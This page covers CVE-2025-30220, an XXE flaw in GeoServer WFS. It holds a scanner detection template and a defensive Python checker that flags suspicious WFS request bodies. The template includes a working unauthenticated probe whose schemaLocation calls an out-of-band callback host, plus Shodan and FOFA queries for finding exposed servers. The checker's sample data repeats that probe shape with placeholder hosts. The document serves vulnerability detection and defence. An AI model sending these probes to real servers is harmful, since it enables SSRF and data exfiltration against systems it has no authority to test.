GeoServer WFS - XXE Processing Vulnerability
CVE-2025-30220
Verified
Description
GeoServer Web Feature Service (WFS) is vulnerable to an XML External Entity (XXE) processing attack due to improper handling of XML input. This vulnerability allows attackers to perform Out-of-Band (OOB) data exfiltration and Server-Side Request Forgery (SSRF) by exploiting the GeoTools library.
Severity
Critical
CVSS Score
9.9
Exploit Probability
8%
Affected Product
geoserver
Published Date
June 17, 2025
Template Author
iamnoooob, pdresearch, darses
CVE-2025-30220.yaml

id: CVE-2025-30220

info:
  name: GeoServer WFS - XXE Processing Vulnerability
  author: iamnoooob,pdresearch,darses
  severity: critical
  description: |
    GeoServer Web Feature Service (WFS) is vulnerable to an XML External Entity (XXE) processing attack due to improper handling of XML input. This vulnerability allows attackers to perform Out-of-Band (OOB) data exfiltration and Server-Side Request Forgery (SSRF) by exploiting the GeoTools library.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities in GeoServer WFS to perform OOB data exfiltration and SSRF attacks, potentially accessing internal services and sensitive data.
  remediation: |
    Upgrade to the latest GeoServer version that properly disables external entity processing in WFS requests.
  reference:
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc
    - https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities
    - https://github.com/geonetwork/core-geonetwork/pull/8757
    - https://github.com/geonetwork/core-geonetwork/pull/8803
    - https://github.com/geonetwork/core-geonetwork/pull/8812
    - https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cve-id: CVE-2025-30220
    cwe-id: CWE-611
    epss-score: 0.08395
    epss-percentile: 0.92295
  metadata:
    verified: true
    max-request: 8
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"geoserver"
      - 'http.html_hash:1093634893 "Content-Disposition: inline"'
      - http.favicon.hash:97540678
      - html:"/geoserver/"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
      - icon_hash="97540678"
      - body="/geoserver/"
  tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/geoserver/ows?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/wfs?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/ows?service=WFS&request=GetCapabilities"
    stop-at-first-match: true
    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'contains(body, "wfs:WFS_Capabilities")'
          - 'contains(content_type, "application/xml")'
          - "status_code == 200"
        condition: and
    extractors:
      - type: xpath
        name: featuretype
        internal: true
        xpath:
          - /wfs:WFS_Capabilities/FeatureTypeList/FeatureType[1]/Name

  - method: POST
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WFS"
      - "{{BaseURL}}/geoserver/ows?service=WFS"
      - "{{BaseURL}}/wfs?service=WFS"
      - "{{BaseURL}}/ows?service=WFS"
    stop-at-first-match: true
    headers:
      Content-Type: "application/xml;charset=UTF-8"
    body: |
      <wfs:GetFeature service="WFS" version="1.0.0"
        xmlns:wfs="http://www.opengis.net/wfs"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
        <wfs:Query typeName="{{featuretype}}"/>
      </wfs:GetFeature>
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "java.lang.NullPointerException")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022035281c2909948ea74c69f64d1037d1049edd25dae8f84854c9e3a91807e67706022100cff0d2151eeeaf4c361824d78a1ce2ee02ac53e2c5533a7536e7004872a892f9:922c64590222798bb761d5b6d8e72950
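The second request in the template above works by pointing xsi:schemaLocation at a host the attacker controls and waiting for the DNS callback. For defenders, the useful mirror image is a check over captured WFS POST bodies that flags exactly that request shape. The following Python checker is an added example, not part of the template and not GeoServer or GeoTools code: it pulls every location out of xsi:schemaLocation and xsi:noNamespaceSchemaLocation, flags locations whose host is outside an allowlist or whose scheme is anything other than http(s), and flags any DOCTYPE or ENTITY declaration, which a WFS request never needs. The allowlist, the sample requests, the source addresses, the callback hostname and the layer name are all constructed for the example; GeoServer's own control for this class of problem is the external entities setting in the production configuration page referenced above.

```python
"""Flag WFS request bodies that reference external resources (constructed example)."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"
SCHEMA_ATTRS = ("{%s}schemaLocation" % XSI_NS, "{%s}noNamespaceSchemaLocation" % XSI_NS)

# Hosts a WFS client may legitimately cite in schemaLocation. Constructed
# allowlist for this example; a real deployment maintains its own.
ALLOWED_SCHEMA_HOSTS = {"schemas.opengis.net", "www.opengis.net", "www.w3.org"}

# A WFS request has no reason to carry a DTD at all.
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def schema_locations(root):
    """Yield every location URI from xsi:schemaLocation-style attributes.

    xsi:schemaLocation holds whitespace-separated (namespace, location) pairs;
    noNamespaceSchemaLocation holds bare locations. Only the locations are
    fetched by a validating parser, so only those are yielded.
    """
    for elem in root.iter():
        for attr in SCHEMA_ATTRS:
            value = elem.attrib.get(attr)
            if not value:
                continue
            tokens = value.split()
            if attr.endswith("}schemaLocation"):
                # An odd token count is malformed; treat every token as a candidate.
                locs = tokens[1::2] if len(tokens) % 2 == 0 else tokens
            else:
                locs = tokens
            for loc in locs:
                yield loc


def is_external(uri):
    """True when fetching uri would reach outside the allowlisted schema hosts."""
    parts = urlsplit(uri)
    if not parts.scheme:
        return False  # relative reference, resolved against the request itself
    if parts.scheme in ("http", "https"):
        return (parts.hostname or "").lower() not in ALLOWED_SCHEMA_HOSTS
    return True  # file:, ftp:, jar: and similar schemes are never expected here


def analyze_body(body):
    """Return a list of findings for one request body; an empty list means nothing suspicious."""
    if DTD_RE.search(body):
        return ["dtd-declaration"]  # do not hand a DTD-bearing document to any parser
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return ["unparseable: %s" % exc]
    return ["external-schema:%s" % loc for loc in schema_locations(root) if is_external(loc)]


def scan_requests(requests):
    """requests: iterable of (source, body) pairs; returns {source: findings} for hits only."""
    hits = {}
    for source, body in requests:
        findings = analyze_body(body)
        if findings:
            hits[source] = findings
    return hits


# Constructed sample traffic: a benign GetFeature, one with the probe shape used
# by the template above (callback host is a placeholder), and one carrying a DTD.
SAMPLE_REQUESTS = [
    ("203.0.113.10", """<wfs:GetFeature service="WFS" version="1.0.0"
  xmlns:wfs="http://www.opengis.net/wfs"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.0.0/WFS-basic.xsd">
  <wfs:Query typeName="topp:states"/>
</wfs:GetFeature>"""),
    ("198.51.100.7", """<wfs:GetFeature service="WFS" version="1.0.0"
  xmlns:wfs="http://www.opengis.net/wfs"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://a http://oast-callback.invalid/xxe.xsd">
  <wfs:Query typeName="topp:states"/>
</wfs:GetFeature>"""),
    ("198.51.100.8", """<!DOCTYPE GetFeature SYSTEM "http://oast-callback.invalid/wfs.dtd">
<wfs:GetFeature service="WFS" version="1.0.0" xmlns:wfs="http://www.opengis.net/wfs">
  <wfs:Query typeName="topp:states"/>
</wfs:GetFeature>"""),
]

if __name__ == "__main__":
    for source, findings in scan_requests(SAMPLE_REQUESTS).items():
        print(source, findings)
```

Two design points: the checker refuses to parse any body containing a DTD rather than relying on the parser to ignore it, so the result does not depend on a library's entity-resolution defaults; and a relative schema location is treated as benign because it cannot name another host, while any non-http scheme is flagged outright. Run over a WAF or access-log export of WFS POST bodies, a hit on the external-schema finding is the same signal the template's interactsh matcher is looking for, observed from the server side instead of from the callback host.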
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
CVE ID: CVE-2025-30220
CWE ID: CWE-611
References
https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc
https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities
https://github.com/geonetwork/core-geonetwork/pull/8757
https://github.com/geonetwork/core-geonetwork/pull/8803
https://github.com/geonetwork/core-geonetwork/pull/8812
https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
Remediation Steps
Upgrade to the latest GeoServer version that properly disables external entity processing in WFS requests.